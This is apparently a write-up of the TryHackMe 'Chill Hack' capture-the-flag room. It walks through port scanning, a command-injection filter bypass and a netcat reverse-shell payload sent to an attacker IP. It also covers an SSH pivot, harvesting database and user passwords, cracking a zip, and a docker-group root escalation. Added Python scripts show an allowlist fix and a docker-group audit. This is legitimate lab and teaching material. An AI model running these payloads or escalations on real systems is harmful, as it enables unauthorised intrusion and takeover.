Chill Hack

Room Link: https://tryhackme.com/room/chillhack

Initial Scan

Kali

nmap -A $VICTIM

Scan all ports

The full port scan found no ports beyond those in the initial scan.

Kali

nmap -sV -sT -O -p 1-65535 $VICTIM

TCP/80 - HTTP

Kali

gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

Many of the commands tried result in this page.

Command Injection

I used the list below to find a way to bypass the filter: adding a \ in the middle of the first command makes it treat the command as a new line, so we can run any command we want.

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection

Web

r\m /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.172.186 1337 >/tmp/f
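To show why the `r\m` trick gets past a word blacklist and what the fix looks like, here is an added example (my code, not the room's index.php, whose filter is not reproduced on the page). It assumes a blacklist that compares whitespace-separated words against a blocked list, and an allowlisted replacement that parses input the way a POSIX shell would (shlex strips the backslash, so `r\m` becomes `rm`), accepts only known commands with tightly constrained arguments, and executes without a shell so `;` and `|` are never interpreted. The blocked and allowed command sets are assumptions for the demo.

```python
import re
import shlex
import subprocess
from typing import List, Optional

# Constructed blacklist in the spirit of the room's filter (assumption:
# the real index.php is not on the page, this only models the idea).
BLOCKED_COMMANDS = {"rm", "nc", "bash", "sh", "python3", "wget", "curl", "mkfifo"}

# Allowlist for the hardened version (assumption: a helpdesk page only
# needs a few read-only diagnostics).
ALLOWED_COMMANDS = {"date", "uptime", "whoami", "echo"}
SAFE_ARG = re.compile(r"^[A-Za-z0-9_./:-]+$")


def blacklist_allows(raw: str) -> bool:
    """Weak check: compare each whitespace-separated word against the blacklist.

    It inspects the string the user typed, not what the shell will run,
    so `r\\m` (which the shell reads as `rm`) slips through.
    """
    return not any(word in BLOCKED_COMMANDS for word in raw.split())


def shell_view(raw: str) -> List[str]:
    """What a POSIX shell sees after backslash and quote removal.

    shlex in POSIX mode applies the same escaping rule: `r\\m` -> `rm`.
    """
    return shlex.split(raw)


def allowlist_argv(raw: str) -> Optional[List[str]]:
    """Hardened check: parse like the shell, then require the command word
    to be allowlisted and every argument to match a tight character set.
    Returns the argv to execute, or None if the input is rejected."""
    try:
        argv = shlex.split(raw)
    except ValueError:  # unbalanced quotes
        return None
    if not argv or argv[0] not in ALLOWED_COMMANDS:
        return None
    if any(not SAFE_ARG.match(arg) for arg in argv[1:]):
        return None
    return argv


def run_allowlisted(raw: str) -> Optional[str]:
    """Execute only argv produced by allowlist_argv, with shell=False, so
    metacharacters such as ; | & reach the program as plain text at most."""
    argv = allowlist_argv(raw)
    if argv is None:
        return None
    result = subprocess.run(argv, capture_output=True, text=True, timeout=5)
    return result.stdout


if __name__ == "__main__":
    payload = r"r\m /tmp/f"  # constructed input, same trick as the room
    print("blacklist allows:", blacklist_allows(payload))
    print("shell sees:", shell_view(payload))
    print("allowlist verdict:", allowlist_argv(payload))
    print("allowlist verdict:", allowlist_argv("date -u"))
```

The blacklist passes the payload because it never sees the word `rm`; the allowlist rejects it because the parsed command word is `rm`, and rejects `echo hi; rm` or `echo hi | nc` because `;` and `|` fall outside the argument character set.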

Kali

nc -lvnp 1337

Victim

python3 -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fg

Victim

sudo -u apaar /home/apaar/.helpline.sh
/bin/bash
/bin/bash

Victim(apaar)

python3 -c 'import pty; pty.spawn("/bin/bash")'

Victim(apaar)

netstat -at
curl localhost:9001

Pivot

Kali

ssh-keygen -t rsa
cat /root/.ssh/id_rsa.pub

Victim

Copy id_rsa.pub into /home/apaar/.ssh/authorized_keys

Kali

vi /etc/proxychains.conf

proxychains.conf

socks4 	127.0.0.1 9050

Kali

ssh -D 9050 apaar@$VICTIM

I can now see the webpage from Kali but no login credentials to use.

Found credentials for mysql in one of the php files.

Victim(apaar)

cat /var/www/files/index.php

Victim(apaar)

mysql -u root -p webportal
Password: !@m+her00+@db

Victim(mysql)

SHOW DATABASES;
use webportal;
SHOW TABLES;
select * from users;

Both sets of credentials work on the login page, and both bring up this page.

No password was needed.

Kali

steghide extract -sf hacker-with-laptop_23-2147985341.jpg

Cracking Password Protected Zip Files

Kali

zip2john backup.zip > secure_john.txt
john --wordlist=/usr/share/wordlists/rockyou.txt secure_john.txt

Kali

unzip backup.zip
Password: pass1word

Kali

cat source_code.php
echo "IWQwbnRLbjB3bVlwQHNzdzByZA==" | base64 -d

Victim(apaar)

su anurodh
Password: !d0ntKn0wmYp@ssw0rd

Privilege Escalation

anurodh is a member of the docker group, which the other user was not. GTFOBins lists a way to get a shell through docker, so I tried it and got root.

Link: https://gtfobins.github.io/gtfobins/docker/#shell

Victim(anurodh)

groups
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
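Because membership in the docker group is effectively root (the container mounts / and chroots into it), the defensive control is knowing who is in that group. Here is an added audit script (my code, not part of the room) that reports members of watched groups from /etc/group, including users whose primary GID in /etc/passwd points at the group, which a plain `getent group docker` misses. The sample /etc/group and /etc/passwd contents are constructed; only the user anurodh is taken from the page, and svc_build is an invented example of a primary-GID member.

```python
import os
from typing import Dict, List, Tuple

WATCHED_GROUPS = ("docker", "sudo")

# Constructed sample files (anurodh comes from the room; svc_build is invented
# to show a user whose primary group is docker without being listed in it).
GROUP_SAMPLE = """root:x:0:
sudo:x:27:
docker:x:999:anurodh
apaar:x:1001:
anurodh:x:1002:
"""
PASSWD_SAMPLE = """root:x:0:0:root:/root:/bin/bash
apaar:x:1001:1001::/home/apaar:/bin/bash
anurodh:x:1002:1002::/home/anurodh:/bin/bash
svc_build:x:1003:999::/home/svc_build:/bin/bash
"""


def parse_group(text: str) -> Dict[str, Tuple[int, List[str]]]:
    """Map group name -> (gid, explicit member list) from /etc/group content."""
    groups: Dict[str, Tuple[int, List[str]]] = {}
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        name, _pw, gid, members = line.split(":", 3)
        groups[name] = (int(gid), [m for m in members.split(",") if m])
    return groups


def parse_primary_gids(text: str) -> Dict[str, int]:
    """Map user name -> primary gid (4th field) from /etc/passwd content."""
    primary: Dict[str, int] = {}
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        primary[fields[0]] = int(fields[3])
    return primary


def privileged_members(group_text: str, passwd_text: str,
                       watched=WATCHED_GROUPS) -> Dict[str, List[str]]:
    """For each watched group present, return every user who is a member,
    whether listed explicitly or via primary GID."""
    groups = parse_group(group_text)
    primary = parse_primary_gids(passwd_text)
    report: Dict[str, List[str]] = {}
    for name in watched:
        if name not in groups:
            continue
        gid, explicit = groups[name]
        via_primary = [u for u, pg in primary.items() if pg == gid]
        report[name] = sorted(set(explicit) | set(via_primary))
    return report


if __name__ == "__main__":
    # Use the live files when available, otherwise the constructed samples.
    if os.path.exists("/etc/group") and os.path.exists("/etc/passwd"):
        with open("/etc/group") as g, open("/etc/passwd") as p:
            report = privileged_members(g.read(), p.read())
    else:
        report = privileged_members(GROUP_SAMPLE, PASSWD_SAMPLE)
    for group, users in report.items():
        print(f"{group}: {', '.join(users) if users else '(no members)'}")
```

Run it on a host and any non-empty docker line is a root-equivalent account to review; the sudo line is included because, on Ubuntu, that group grants sudo by default.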
